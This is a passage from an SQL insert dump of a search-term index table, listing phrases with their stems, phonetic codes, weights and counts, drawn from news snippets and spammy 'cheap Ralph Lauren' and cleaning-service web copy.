spacey','underwood kevin spacey',0,1,1.7333,'U5363215212',1,'en'),(33390,'unique','uniqu',0,0,0.4,'U520',1,'en'),(33391,'unique style','uniqu style',0,1,1.4,'U5234',1,'en'),(33392,'unique style from','uniqu style from',0,1,1.5667,'U5234165',1,'en'),(33393,'united states','unit states',0,1,1.4333,'U53232',2,'en'),(33394,'united states of','unit states of',0,1,1.5333,'U532321',1,'en'),(33395,'unknown this','unknown this',0,1,1.4,'U52532',1,'en'),(33396,'unknown this just','unknown this just',0,1,1.5667,'U525323',1,'en'),(33397,'up an','up an',0,1,1.1667,'U150',1,'en'),(33398,'up an emmy','up an emmy',0,1,1.3333,'U150',1,'en'),(33399,'up there','up there',0,1,1.2667,'U136',1,'en'),(33400,'up there i','up there i',0,1,1.3333,'U136',1,'en'),(33401,'upcoming arrival','upcom arrival',0,1,1.5333,'U1252614',1,'en'),(33402,'upcoming arrival of','upcom arrival of',0,1,1.6333,'U12526141',1,'en'),(33403,'us our','us our',0,1,1.2,'U260',1,'en'),(33404,'us our friends','us our friends',0,1,1.4667,'U2616532',1,'en'),(33405,'usa todayjim','usa todayjim',0,1,1.4,'U2325',1,'en'),(33406,'usa todayjim parsons','usa todayjim parsons',0,1,1.6667,'U232516252',1,'en'),(33407,'vehicle','vehicl',0,0,0.4667,'V240',2,'en'),(33408,'vehicle and','vehicl and',0,1,1.3667,'V2453',1,'en'),(33409,'vehicle and i','vehicl and i',0,1,1.4333,'V2453',1,'en'),(33410,'very taken','veri taken',0,1,1.3333,'V6325',1,'en'),(33411,'very taken aback','veri taken aback',0,1,1.5333,'V632512',1,'en'),(33412,'vivier','vivier',0,0,0.4,'V600',1,'en'),(33413,'vivier heels','vivier heels',0,1,1.4,'V642',1,'en'),(33414,'vivier heels and','vivier heels and',0,1,1.5333,'V64253',1,'en'),(33415,'was a labor','wa a labor',0,1,1.3667,'W2416',1,'en'),(33416,'was an','wa an',0,1,1.2,'W250',3,'en'),(33417,'was an additional','wa an additional',0,1,1.5667,'W25354',1,'en'),(33418,'was both','wa both',0,1,1.2667,'W213',1,'en'),(33419,'was both loving','wa both loving',0,1,1.5,'W2134152',1,'en'),(33420,'was possessing','wa possessing',0,1,1.4667,'W21252',1,'en'),(33421,'was possessing project','wa possessing project',0,1,1.7333,'W212521623',1,'en'),(33422,'was struck','wa struck',0,1,1.3333,'W2362',1,'en'),(33423,'was struck with','wa struck with',0,1,1.5,'W23623',1,'en'),(33424,'was taking','wa taking',0,1,1.3333,'W23252',1,'en'),(33425,'was taking into','wa taking into',0,1,1.5,'W2325253',1,'en'),(33426,'was thankful','wa thankful',0,1,1.4,'W235214',1,'en'),(33427,'was thankful for','wa thankful for',0,1,1.5333,'W23521416',1,'en'),(33428,'was very','wa very',0,1,1.2667,'W216',1,'en'),(33429,'was very taken','wa very taken',0,1,1.4667,'W216325',1,'en'),(33430,'we got','we got',0,1,1.2,'W230',1,'en'),(33431,'we got them','we got them',0,1,1.3667,'W235',1,'en'),(33432,'well i','well i',0,1,1.2,'W400',2,'en'),(33433,'well i enjoy','well i enjoy',0,1,1.4,'W452',1,'en'),(33434,'when i got','when i got',0,1,1.3333,'W523',1,'en'),(33435,'when nobody','when nobody',0,1,1.3667,'W513',1,'en'),(33436,'when nobody else','when nobody else',0,1,1.5333,'W51342',1,'en'),(33437,'when they','when they',0,1,1.3,'W530',1,'en'),(33438,'when they see','when they see',0,1,1.4333,'W532',1,'en'),(33439,'which makes','which makes',0,1,1.3667,'W252',1,'en'),(33440,'which makes them','which makes them',0,1,1.5333,'W25235',1,'en'),(33441,'who does','who does',0,1,1.2667,'W320',1,'en'),(33442,'who does win','who does win',0,1,1.4,'W325',1,'en'),(33443,'whole lot','whole lot',0,1,1.3,'W430',1,'en'),(33444,'whole lot freer','whole lot freer',0,1,1.5,'W4316',1,'en'),(33445,'wife we','wife we',0,1,1.2333,'W100',1,'en'),(33446,'wife we got','wife we got',0,1,1.3667,'W123',1,'en'),(33447,'will be global','will be global',0,1,1.4667,'W412414',1,'en'),(33448,'win a','win a',0,1,1.1667,'W500',1,'en'),(33449,'win a political','win a political',0,1,1.5,'W514324',1,'en'),(33450,'win not','win not',0,1,1.2333,'W530',1,'en'),(33451,'win not that','win not that',0,1,1.4,'W530',1,'en'),(33452,'winner has only','winner has only',0,1,1.5,'W56254',1,'en'),(33453,'winner says','winner says',0,1,1.3667,'W562',1,'en'),(33454,'winner says life','winner says life',0,1,1.5333,'W56241',1,'en'),(33455,'winner this','winner this',0,1,1.3667,'W5632',1,'en'),(33456,'winner this is','winner this is',0,1,1.4667,'W5632',1,'en'),(33457,'with a sense','with a sense',0,1,1.4,'W3252',1,'en'),(33458,'with father','with father',0,1,1.3667,'W3136',1,'en'),(33459,'with father lester','with father lester',0,1,1.6,'W31364236',1,'en'),(33460,'with my wife','with my wife',0,1,1.4,'W351',1,'en'),(33461,'within a','within a',0,1,1.2667,'W350',1,'en'),(33462,'within a gut','within a gut',0,1,1.4,'W3523',1,'en'),(33463,'work a little','work a little',0,1,1.4333,'W62434',1,'en'),(33464,'writing','write',0,0,0.4667,'W6352',1,'en'),(33465,'writing in','write in',0,1,1.3333,'W63525',1,'en'),(33466,'writing in a','write in a',0,1,1.4,'W63525',1,'en'),(33467,'year greater','year greater',0,1,1.4,'Y62636',1,'en'),(33468,'year greater numbers','year greater numbers',0,1,1.6667,'Y626365162',1,'en'),(33469,'year spending','year spending',0,1,1.4333,'Y6215352',1,'en'),(33470,'year spending budget','year spending budget',0,1,1.6667,'Y62153521323',1,'en'),(33471,'years ago','year ago',0,1,1.3,'Y620',1,'en'),(33472,'years ago getting','year ago getting',0,1,1.5667,'Y62352',1,'en'),(33473,'years on','year on',0,1,1.2667,'Y625',1,'en'),(33474,'years on nbc','year on nbc',0,1,1.4,'Y62512',1,'en'),(33475,'years this','year this',0,1,1.3333,'Y6232',1,'en'),(33476,'years this kind','year this kind',0,1,1.5,'Y623253',1,'en'),(33477,'you feel','you feel',0,1,1.2667,'Y140',1,'en'),(33478,'you feel yourself','you feel yourself',0,1,1.5667,'Y146241',1,'en'),(33479,'you get to','you get to',0,1,1.3333,'Y230',1,'en'),(33480,'young child','young child',0,1,1.3667,'Y5243',1,'en'),(33481,'young child owing','young child owing',0,1,1.5667,'Y524352',1,'en'),(33482,'yourself to','yourself to',0,1,1.3667,'Y62413',1,'en'),(33483,'yourself to be','yourself to be',0,1,1.4667,'Y624131',1,'en'),(33484,'126','126',0,0,0.3,'',1,'en'),(33485,'a a','a a',0,1,1.1,'A000',1,'en'),(33486,'a a big','a a big',0,1,1.2333,'A120',1,'en'),(33487,'a big','a big',0,1,1.1667,'A120',3,'en'),(33488,'a big pain','a big pain',0,1,1.3333,'A1215',1,'en'),(33489,'a different','a different',0,1,1.3667,'A31653',1,'en'),(33490,'a different strategy','a different strategy',0,1,1.6667,'A3165323632',1,'en'),(33491,'a heavy','a heavy',0,1,1.2333,'A100',1,'en'),(33492,'a heavy body','a heavy body',0,1,1.4,'A130',1,'en'),(33493,'a natural','a natural',0,1,1.3,'A5364',1,'en'),(33494,'a natural and','a natural and',0,1,1.4333,'A536453',1,'en'),(33495,'a non','a non',0,1,1.1667,'A500',1,'en'),(33496,'a non zero','a non zero',0,1,1.3333,'A526',1,'en'),(33497,'a normal','a normal',0,1,1.2667,'A5654',1,'en'),(33498,'a normal business','a normal business',0,1,1.5667,'A56541252',1,'en'),(33499,'a particular','a particular',0,1,1.4,'A163246',1,'en'),(33500,'a particular ralph','a particular ralph',0,1,1.6,'A16324641',1,'en'),(33501,'a thoroughly','a thoroughly',0,1,1.4,'A3624',1,'en'),(33502,'a thoroughly top','a thoroughly top',0,1,1.5333,'A362431',1,'en'),(33503,'a towel','a towel',0,1,1.2333,'A340',1,'en'),(33504,'a towel and','a towel and',0,1,1.3667,'A3453',1,'en'),(33505,'a womens','a womens',0,1,1.2667,'A520',1,'en'),(33506,'a womens ralph','a womens ralph',0,1,1.4667,'A52641',1,'en'),(33507,'accessories','accessori',0,0,0.7333,'A262',1,'en'),(33508,'accessories carpet','accessori carpet',0,1,1.6,'A262613',1,'en'),(33509,'accessories carpet cleaners','accessori carpet cleaners',0,1,1.9,'A26261324562',1,'en'),(33510,'accessories own','accessori own',0,1,1.5,'A2625',1,'en'),(33511,'accessories own mens','accessori own mens',0,1,1.6667,'A26252',1,'en'),(33512,'across residential','across residential',0,1,1.6,'A262623534',1,'en'),(33513,'across residential or','across residential or',0,1,1.7,'A2626235346',1,'en'),(33514,'actual polo','actual polo',0,1,1.3667,'A23414',1,'en'),(33515,'actual polo ralph','actual polo ralph',0,1,1.5667,'A23414641',1,'en'),(33516,'actual towel','actual towel',0,1,1.4,'A23434',1,'en'),(33517,'actual towel and','actual towel and',0,1,1.5333,'A2343453',1,'en'),(33518,'actually','actual',0,0,0.5333,'A234',3,'en'),(33519,'actually then','actual then',0,1,1.4333,'A23435',1,'en'),(33520,'actually then preventable','actual then preventable',0,1,1.8333,'A234351615314',1,'en'),(33521,'addition of','addit of',0,1,1.3667,'A351',1,'en'),(33522,'addition of the','addit of the',0,1,1.5,'A3513',1,'en'),(33523,'address cheap','address cheap',0,1,1.4333,'A3621',1,'en'),(33524,'address cheap ralph','address cheap ralph',0,1,1.6333,'A3621641',1,'en'),(33525,'agencies','agenc',0,0,0.5333,'A252',1,'en'),(33526,'agencies that','agenc that',0,1,1.4333,'A2523',1,'en'),(33527,'agencies that operate','agenc that operate',0,1,1.7,'A2523163',1,'en'),(33528,'air of','air of',0,1,1.2,'A610',1,'en'),(33529,'air of professionalism','air of professionalism',0,1,1.7333,'A616125425',1,'en'),(33530,'all ralph','all ralph',0,1,1.3,'A4641',1,'en'),(33531,'all ralph lauren','all ralph lauren',0,1,1.5333,'A4641465',1,'en'),(33532,'all stain','all stain',0,1,1.3,'A4235',1,'en'),(33533,'all stain and','all stain and',0,1,1.4333,'A42353',1,'en'),(33534,'all this we','all this we',0,1,1.3667,'A432',1,'en'),(33535,'allow the','allow the',0,1,1.3,'A430',1,'en'),(33536,'allow the towel','allow the towel',0,1,1.5,'A434',1,'en'),(33537,'along with the','along with the',0,1,1.4667,'A4523',1,'en'),(33538,'also be','also be',0,1,1.2333,'A421',1,'en'),(33539,'also be classified','also be classified',0,1,1.6,'A42124213',1,'en'),(33540,'also business','also business',0,1,1.4333,'A421252',1,'en'),(33541,'also business mens','also business mens',0,1,1.6,'A42125252',1,'en'),(33542,'amid','amid',0,0,0.2667,'A530',1,'en'),(33543,'amid ralph','amid ralph',0,1,1.3333,'A53641',1,'en'),(33544,'amid ralph lauren','amid ralph lauren',0,1,1.5667,'A53641465',1,'en'),(33545,'amongst','amongst',0,0,0.4667,'A523',1,'en'),(33546,'amongst glass','amongst glass',0,1,1.4333,'A523242',1,'en'),(33547,'amongst glass sheets','amongst glass sheets',0,1,1.6667,'A52324232',1,'en'),(33548,'an example look','an example look',0,1,1.5,'A525142',1,'en'),(33549,'an ralph','an ralph',0,1,1.2667,'A5641',1,'en'),(33550,'an ralph lauren','an ralph lauren',0,1,1.5,'A5641465',1,'en'),(33551,'and cheap','and cheap',0,1,1.3,'A5321',1,'en'),(33552,'and cheap polo','and cheap polo',0,1,1.4667,'A53214',1,'en'),(33553,'and for that','and for that',0,1,1.4,'A53163',1,'en'),(33554,'and i established','and i established',0,1,1.5667,'A53231423',1,'en'),(33555,'and in addition','and in addition',0,1,1.5,'A53535',1,'en'),(33556,'and input','and input',0,1,1.3,'A53513',1,'en'),(33557,'and input it','and input it',0,1,1.4,'A53513',1,'en'),(33558,'and minerals','and minerals',0,1,1.4,'A535642',1,'en'),(33559,'and minerals are','and minerals are',0,1,1.5333,'A5356426',1,'en'),(33560,'and more','and more',0,1,1.2667,'A5356',1,'en'),(33561,'and more so','and more so',0,1,1.3667,'A53562',1,'en'),(33562,'and office','and office',0,1,1.3333,'A5312',2,'en'),(33563,'and office windows','and office windows',0,1,1.6,'A5312532',1,'en'),(33564,'and or cleaning','and or cleaning',0,1,1.5,'A5362452',1,'en'),(33565,'and polo','and polo',0,1,1.2667,'A5314',1,'en'),(33566,'and polo ralph','and polo ralph',0,1,1.4667,'A5314641',1,'en'),(33567,'and procedures','and procedures',0,1,1.4667,'A53162362',1,'en'),(33568,'and procedures ralph','and procedures ralph',0,1,1.6667,'A53162362641',1,'en'),(33569,'and reliability','and reliability',0,1,1.5,'A5364143',1,'en'),(33570,'and reliability now','and reliability now',0,1,1.6333,'A53641435',1,'en'),(33571,'and scientific','and scientific',0,1,1.4667,'A5325312',1,'en'),(33572,'and scientific effect','and scientific effect',0,1,1.7,'A5325312123',1,'en'),(33573,'and some are','and some are',0,1,1.4,'A53256',1,'en'),(33574,'and sparkling','and sparkling',0,1,1.4333,'A532162452',1,'en'),(33575,'and sparkling your','and sparkling your',0,1,1.6,'A5321624526',1,'en'),(33576,'and spray','and spray',0,1,1.3,'A53216',1,'en'),(33577,'and spray wholesale','and spray wholesale',0,1,1.6333,'A53216424',1,'en'),(33578,'and the actual','and the actual',0,1,1.4667,'A53234',1,'en'),(33579,'and thus','and thus',0,1,1.2667,'A532',1,'en'),(33580,'and thus they','and thus they',0,1,1.4333,'A5323',1,'en'),(33581,'any household','ani household',0,1,1.4333,'A5243',1,'en'),(33582,'any household and','ani household and',0,1,1.5667,'A524353',1,'en'),(33583,'any wholesale','ani wholesale',0,1,1.4333,'A5424',1,'en'),(33584,'any wholesale polo','ani wholesale polo',0,1,1.6,'A542414',1,'en'),(33585,'apparatus','apparatu',0,0,0.6,'A1632',1,'en'),(33586,'apparatus well','apparatu well',0,1,1.4667,'A16324',1,'en'),(33587,'apparatus well masters','apparatu well masters',0,1,1.7333,'A1632452362',1,'en'),(33588,'are cheap','ar cheap',0,1,1.3,'A621',1,'en'),(33589,'are cheap polo','ar cheap polo',0,1,1.4667,'A6214',1,'en'),(33590,'are expert','ar expert',0,1,1.3333,'A62163',1,'en'),(33591,'are expert services','ar expert services',0,1,1.6333,'A621632612',1,'en'),(33592,'are ralph','ar ralph',0,1,1.3,'A641',1,'en'),(33593,'are ralph lauren','ar ralph lauren',0,1,1.5333,'A641465',1,'en'),(33594,'are taken','ar taken',0,1,1.3,'A6325',1,'en'),(33595,'are taken off','ar taken off',0,1,1.4333,'A63251',1,'en'),(33596,'are the ralph','ar the ralph',0,1,1.4333,'A63641',1,'en'),(33597,'are tricky','ar tricky',0,1,1.3333,'A6362',1,'en'),(33598,'are tricky to','ar tricky to',0,1,1.4333,'A63623',1,'en'),(33599,'as a a','as a a',0,1,1.2,'A200',1,'en'),(33600,'as ralph','as ralph',0,1,1.2667,'A2641',1,'en'),(33601,'as ralph lauren','as ralph lauren',0,1,1.5,'A2641465',1,'en'),(33602,'assist','assist',0,0,0.4,'A230',1,'en'),(33603,'assist the','assist the',0,1,1.3333,'A230',1,'en'),(33604,'assist the cleaners','assist the cleaners',0,1,1.6333,'A2324562',1,'en'),(33605,'astoundingly','astoundingli',0,0,0.8,'A2353524',1,'en'),(33606,'astoundingly for','astoundingli for',0,1,1.5333,'A235352416',1,'en'),(33607,'astoundingly for businesses','astoundingli for businesses',0,1,1.9,'A2353524161252',1,'en'),(33608,'at some','at some',0,1,1.2333,'A325',1,'en'),(33609,'at some thing','at some thing',0,1,1.4333,'A325352',1,'en'),(33610,'at the solutions','at the solutions',0,1,1.5333,'A324352',1,'en'),(33611,'at the wholesale','at the wholesale',0,1,1.5333,'A3424',1,'en'),(33612,'bags','bag',0,0,0.2667,'B200',2,'en'),(33613,'bags cheap','bag cheap',0,1,1.3333,'B210',1,'en'),(33614,'bags cheap that','bag cheap that',0,1,1.5,'B213',1,'en'),(33615,'bags clean','bag clean',0,1,1.3333,'B245',1,'en'),(33616,'bags clean cheap','bag clean cheap',0,1,1.5333,'B24521',1,'en'),(33617,'bags for','bag for',0,1,1.2667,'B216',2,'en'),(33618,'bags for cheap','bag for cheap',0,1,1.4667,'B21621',1,'en'),(33619,'basic materials','basic materials',0,1,1.5,'B253642',1,'en'),(33620,'basic materials tools','basic materials tools',0,1,1.7,'B253642342',1,'en'),(33621,'bath','bath',0,0,0.2667,'B300',1,'en'),(33622,'bath ralph','bath ralph',0,1,1.3333,'B3641',1,'en'),(33623,'bath ralph lauren','bath ralph lauren',0,1,1.5667,'B3641465',1,'en'),(33624,'be classified','be classified',0,1,1.4333,'B24213',1,'en'),(33625,'be classified in','be classified in',0,1,1.5333,'B242135',1,'en'),(33626,'be cleaned','be cleaned',0,1,1.3333,'B2453',1,'en'),(33627,'be cleaned ralph','be cleaned ralph',0,1,1.5333,'B2453641',1,'en'),(33628,'be contractual','be contractual',0,1,1.4667,'B2536234',1,'en'),(33629,'be contractual in','be contractual in',0,1,1.5667,'B25362345',1,'en'),(33630,'be delivered','be delivered',0,1,1.4,'B34163',1,'en'),(33631,'be delivered through','be delivered through',0,1,1.6667,'B3416362',1,'en'),(33632,'belts','belt',0,0,0.3333,'B432',1,'en'),(33633,'belts cheap','belt cheap',0,1,1.3667,'B4321',1,'en'),(33634,'belts cheap trivial','belt cheap trivial',0,1,1.6333,'B43213614',1,'en'),(33635,'belts for','belt for',0,1,1.3,'B43216',1,'en'),(33636,'belts for cheap','belt for cheap',0,1,1.5,'B4321621',1,'en'),(33637,'belts online','belt online',0,1,1.4,'B432545',1,'en'),(33638,'belts online weight','belt online weight',0,1,1.6333,'B43254523',1,'en'),(33639,'belts or','belt or',0,1,1.2667,'B4326',1,'en'),(33640,'belts or business','belt or business',0,1,1.5667,'B43261252',1,'en'),(33641,'big books','big books',0,1,1.3,'B212',1,'en'),(33642,'big books or','big books or',0,1,1.4,'B2126',1,'en'),(33643,'big pain','big pain',0,1,1.2667,'B215',1,'en'),(33644,'big pain for','big pain for',0,1,1.4,'B21516',1,'en'),(33645,'blemish','blemish',0,0,0.4667,'B452',1,'en'),(33646,'blemish inwards','blemish inwards',0,1,1.5,'B4525632',1,'en'),(33647,'blemish inwards until','blemish inwards until',0,1,1.7,'B4525632534',1,'en'),(33648,'boards','board',0,0,0.4,'B632',1,'en'),(33649,'boards work','board work',0,1,1.3667,'B63262',1,'en'),(33650,'boards work okay','board work okay',0,1,1.5333,'B63262',1,'en'),(33651,'body mens','bodi mens',0,1,1.3,'B352',1,'en'),(33652,'body mens ralph','bodi mens ralph',0,1,1.5,'B352641',1,'en'),(33653,'books','book',0,0,0.3333,'B200',1,'en'),(33654,'books or','book or',0,1,1.2667,'B260',1,'en'),(33655,'books or wooden','book or wooden',0,1,1.5,'B2635',1,'en'),(33656,'bottle of','bottl of',0,1,1.3,'B341',1,'en'),(33657,'bottle of spray','bottl of spray',0,1,1.5,'B341216',1,'en'),(33658,'bottle of vinegar','bottl of vinegar',0,1,1.5667,'B341526',1,'en'),(33659,'bound fashion','bound fashion',0,1,1.4333,'B53125',1,'en'),(33660,'bound fashion the','bound fashion the',0,1,1.5667,'B531253',1,'en'),(33661,'boys','boi',0,0,0.2667,'B200',3,'en'),(33662,'boys occupies','boi occupies',0,1,1.4333,'B212',1,'en'),(33663,'boys occupies cheap','boi occupies cheap',0,1,1.6333,'B2121',1,'en'),(33664,'boys ralph','boi ralph',0,1,1.3333,'B2641',2,'en'),(33665,'boys ralph lauren','boi ralph lauren',0,1,1.5667,'B2641465',2,'en'),(33666,'broad','broad',0,0,0.3333,'B630',1,'en'),(33667,'broad cheap','broad cheap',0,1,1.3667,'B6321',1,'en'),(33668,'broad cheap ralph','broad cheap ralph',0,1,1.5667,'B6321641',1,'en'),(33669,'bucket','bucket',0,0,0.4,'B230',1,'en'),(33670,'bucket of','bucket of',0,1,1.3,'B231',1,'en'),(33671,'bucket of fresh','bucket of fresh',0,1,1.5,'B23162',1,'en'),(33672,'business cheap','busi cheap',0,1,1.4667,'B2521',1,'en'),(33673,'business cheap polo','busi cheap polo',0,1,1.6333,'B25214',1,'en'),(33674,'business cleaning','busi cleaning',0,1,1.5667,'B252452',1,'en'),(33675,'business cleaning melbourne','busi cleaning melbourne',0,1,1.9,'B25245254165',1,'en'),(33676,'business cleaning services','busi cleaning services',0,1,1.8667,'B252452612',1,'en'),(33677,'business in','busi in',0,1,1.3667,'B2525',1,'en'),(33678,'business in the','busi in the',0,1,1.5,'B25253',1,'en'),(33679,'business indeed','busi indeed',0,1,1.5,'B25253',1,'en'),(33680,'business indeed but','busi indeed but',0,1,1.6333,'B2525313',1,'en'),(33681,'business mens','busi mens',0,1,1.4333,'B25252',1,'en'),(33682,'business mens polo','busi mens polo',0,1,1.6,'B2525214',1,'en'),(33683,'business success','busi success',0,1,1.5333,'B252',1,'en'),(33684,'business success is','busi success is',0,1,1.6333,'B252',1,'en'),(33685,'businesses','busi',0,0,0.6667,'B252',1,'en'),(33686,'businesses the','busi the',0,1,1.4667,'B2523',1,'en'),(33687,'businesses the growing','busi the growing',0,1,1.7333,'B25232652',1,'en'),(33688,'businesses would','busi would',0,1,1.5333,'B25243',1,'en'),(33689,'businesses would ralph','busi would ralph',0,1,1.7333,'B25243641',1,'en'),(33690,'but amid','but amid',0,1,1.2667,'B353',1,'en'),(33691,'but amid ralph','but amid ralph',0,1,1.4667,'B353641',1,'en'),(33692,'but immensely','but immensely',0,1,1.4333,'B3524',1,'en'),(33693,'but immensely necessary','but immensely necessary',0,1,1.7667,'B3524526',1,'en'),(33694,'can also be','can also be',0,1,1.3667,'C5421',1,'en'),(33695,'can employ','can employ',0,1,1.3333,'C514',1,'en'),(33696,'can employ professional','can employ professional',0,1,1.7667,'C514161254',1,'en'),(33697,'carpet cleaned','carpet cleaned',0,1,1.4667,'C6132453',1,'en'),(33698,'carpet cleaned polo','carpet cleaned polo',0,1,1.6333,'C613245314',1,'en'),(33699,'carpet cleaners','carpet cleaners',0,1,1.5,'C61324562',1,'en'),(33700,'carpet cleaners cheap','carpet cleaners cheap',0,1,1.7,'C613245621',1,'en'),(33701,'carpet with','carpet with',0,1,1.3667,'C613',1,'en'),(33702,'carpet with substances','carpet with substances',0,1,1.7333,'C613212352',1,'en'),(33703,'categories','categori',0,0,0.6667,'C3262',1,'en'),(33704,'categories ralph','categori ralph',0,1,1.5333,'C3262641',1,'en'),(33705,'categories ralph lauren','categori ralph lauren',0,1,1.7667,'C3262641465',1,'en'),(33706,'category is','categori is',0,1,1.3667,'C3262',1,'en'),(33707,'category is not','categori is not',0,1,1.5,'C326253',1,'en'),(33708,'charge','charg',0,0,0.4,'C620',2,'en'),(33709,'charge cheap','charg cheap',0,1,1.4,'C621',1,'en'),(33710,'charge cheap ralph','charg cheap ralph',0,1,1.6,'C621641',1,'en'),(33711,'cheap come','cheap come',0,1,1.3333,'C125',1,'en'),(33712,'cheap come loaded','cheap come loaded',0,1,1.5667,'C12543',1,'en'),(33713,'cheap expanses','cheap expanses',0,1,1.4667,'C12152',1,'en'),(33714,'cheap expanses cheap','cheap expanses cheap',0,1,1.6667,'C121521',1,'en'),(33715,'cheap inventory','cheap inventory',0,1,1.5,'C151536',1,'en'),(33716,'cheap inventory so','cheap inventory so',0,1,1.6,'C1515362',1,'en'),(33717,'cheap polo','cheap polo',0,1,1.3333,'C140',2,'en'),(33718,'cheap polo ralph','cheap polo ralph',0,1,1.5333,'C14641',2,'en'),(33719,'cheap some','cheap some',0,1,1.3333,'C125',1,'en'),(33720,'cheap some serves','cheap some serves',0,1,1.5667,'C1252612',1,'en'),(33721,'cheap that','cheap that',0,1,1.3333,'C130',1,'en'),(33722,'cheap that it','cheap that it',0,1,1.4333,'C130',1,'en'),(33723,'cheap trivial','cheap trivial',0,1,1.4333,'C13614',1,'en'),(33724,'cheap trivial but','cheap trivial but',0,1,1.5667,'C1361413',1,'en'),(33725,'check that','check that',0,1,1.3333,'C300',1,'en'),(33726,'check that polo','check that polo',0,1,1.5,'C314',1,'en'),(33727,'chemicals is','chemic is',0,1,1.4,'C5242',1,'en'),(33728,'chemicals is polo','chemic is polo',0,1,1.5667,'C524214',1,'en'),(33729,'chore','chore',0,0,0.3333,'C600',1,'en'),(33730,'chore one','chore one',0,1,1.3,'C650',1,'en'),(33731,'chore one of','chore one of',0,1,1.4,'C651',1,'en'),(33732,'chores','chore',0,0,0.4,'C620',1,'en'),(33733,'chores the','chore the',0,1,1.3333,'C623',1,'en'),(33734,'chores the contract','chore the contract',0,1,1.6333,'C623253623',1,'en'),(33735,'classic fit','classic fit',0,1,1.3667,'C4213',2,'en'),(33736,'classic fit outlet','classic fit outlet',0,1,1.6,'C421343',1,'en'),(33737,'classified','classifi',0,0,0.6667,'C4213',2,'en'),(33738,'classified in','classifi in',0,1,1.4333,'C42135',1,'en'),(33739,'classified in term','classifi in term',0,1,1.6,'C42135365',1,'en'),(33740,'clean a','clean a',0,1,1.2333,'C450',1,'en'),(33741,'clean a particular','clean a particular',0,1,1.6,'C45163246',1,'en'),(33742,'clean cheap','clean cheap',0,1,1.3667,'C4521',1,'en'),(33743,'clean cheap ralph','clean cheap ralph',0,1,1.5667,'C4521641',1,'en'),(33744,'clean thick','clean thick',0,1,1.3667,'C4532',1,'en'),(33745,'clean thick boys','clean thick boys',0,1,1.5333,'C453212',1,'en'),(33746,'clean women','clean women',0,1,1.3667,'C450',1,'en'),(33747,'clean women ralph','clean women ralph',0,1,1.5667,'C45641',1,'en'),(33748,'cleaned','clean',0,0,0.4667,'C453',1,'en'),(33749,'cleaned polo','clean polo',0,1,1.4,'C45314',1,'en'),(33750,'cleaned polo ralph','clean polo ralph',0,1,1.6,'C45314641',1,'en'),(33751,'cleaned ralph','clean ralph',0,1,1.4333,'C453641',1,'en'),(33752,'cleaned ralph lauren','clean ralph lauren',0,1,1.6667,'C453641465',1,'en'),(33753,'cleaners','cleaner',0,0,0.5333,'C4562',1,'en'),(33754,'cleaners can','cleaner can',0,1,1.4,'C45625',1,'en'),(33755,'cleaners can also','cleaner can also',0,1,1.5667,'C4562542',1,'en'),(33756,'cleaners cheap','cleaner cheap',0,1,1.4667,'C45621',1,'en'),(33757,'cleaners cheap ralph','cleaner cheap ralph',0,1,1.6667,'C45621641',1,'en'),(33758,'cleaners constantly','cleaner constantly',0,1,1.6333,'C4562523534',1,'en'),(33759,'cleaners constantly to','cleaner constantly to',0,1,1.7333,'C45625235343',1,'en'),(33760,'cleaners to','cleaner to',0,1,1.3667,'C45623',1,'en'),(33761,'cleaners to address','cleaner to address',0,1,1.6333,'C4562362',1,'en'),(33762,'cleaners to have','cleaner to have',0,1,1.5333,'C456231',1,'en'),(33763,'cleaning','clean',0,0,0.5333,'C452',1,'en'),(33764,'cleaning and','clean and',0,1,1.4,'C45253',1,'en'),(33765,'cleaning and thus','clean and thus',0,1,1.5667,'C452532',1,'en'),(33766,'cleaning chemicals','clean chemicals',0,1,1.6,'C4525242',1,'en'),(33767,'cleaning chemicals is','clean chemicals is',0,1,1.7,'C4525242',1,'en'),(33768,'cleaning chores','clean chores',0,1,1.5,'C45262',1,'en'),(33769,'cleaning chores the','clean chores the',0,1,1.6333,'C452623',1,'en'),(33770,'cleaning is','clean is',0,1,1.3667,'C452',1,'en'),(33771,'cleaning is required','clean is required',0,1,1.6667,'C4526263',1,'en'),(33772,'cleaning melbourne','clean melbourne',0,1,1.6,'C45254165',1,'en'),(33773,'cleaning melbourne some','clean melbourne some',0,1,1.7667,'C4525416525',1,'en'),(33774,'cleaning providers','clean providers',0,1,1.6,'C452161362',1,'en'),(33775,'cleaning providers out','clean providers out',0,1,1.7333,'C4521613623',1,'en'),(33776,'cleaning services','clean services',0,1,1.5667,'C452612',1,'en'),(33777,'cleaning services these','clean services these',0,1,1.7667,'C45261232',1,'en'),(33778,'cleaning this','clean this',0,1,1.4333,'C45232',1,'en'),(33779,'cleaning this comes','clean this comes',0,1,1.6333,'C4523252',1,'en'),(33780,'cleansers','cleanser',0,0,0.6,'C45262',1,'en'),(33781,'cleansers to','cleanser to',0,1,1.4,'C452623',1,'en'),(33782,'cleansers to the','cleanser to the',0,1,1.5333,'C452623',1,'en'),(33783,'cleansing','cleans',0,0,0.6,'C45252',1,'en'),(33784,'cleansing shop','cleans shop',0,1,1.4667,'C452521',1,'en'),(33785,'cleansing shop and','cleans shop and',0,1,1.6,'C45252153',1,'en'),(33786,'cleanup','cleanup',0,0,0.4667,'C451',1,'en'),(33787,'cleanup to','cleanup to',0,1,1.3333,'C4513',1,'en'),(33788,'cleanup to your','cleanup to your',0,1,1.5,'C45136',1,'en'),(33789,'cloth','cloth',0,0,0.3333,'C430',1,'en'),(33790,'cloth and','cloth and',0,1,1.3,'C4353',1,'en'),(33791,'cloth and cheap','cloth and cheap',0,1,1.5,'C435321',1,'en'),(33792,'come and','come and',0,1,1.2667,'C530',1,'en'),(33793,'come and sparkling','come and sparkling',0,1,1.6,'C532162452',1,'en'),(33794,'come in','come in',0,1,1.2333,'C500',1,'en'),(33795,'come in handy','come in handy',0,1,1.4333,'C530',1,'en'),(33796,'come loaded','come loaded',0,1,1.3667,'C543',1,'en'),(33797,'come loaded their','come loaded their',0,1,1.5667,'C5436',1,'en'),(33798,'comes mens','come mens',0,1,1.3333,'C5252',1,'en'),(33799,'comes mens ralph','come mens ralph',0,1,1.5333,'C5252641',1,'en'),(33800,'commercial cheap','commerci cheap',0,1,1.5333,'C562421',1,'en'),(33801,'commercial cheap ralph','commerci cheap ralph',0,1,1.7333,'C562421641',1,'en'),(33802,'complete them','complet them',0,1,1.4333,'C51435',1,'en'),(33803,'complete them there','complet them there',0,1,1.6333,'C5143536',1,'en'),(33804,'comprehensive','comprehens',0,0,0.8667,'C516521',1,'en'),(33805,'comprehensive ralph','comprehens ralph',0,1,1.6333,'C516521641',1,'en'),(33806,'comprehensive ralph lauren','comprehens ralph lauren',0,1,1.8667,'C516521641465',1,'en'),(33807,'concerning ten','concern 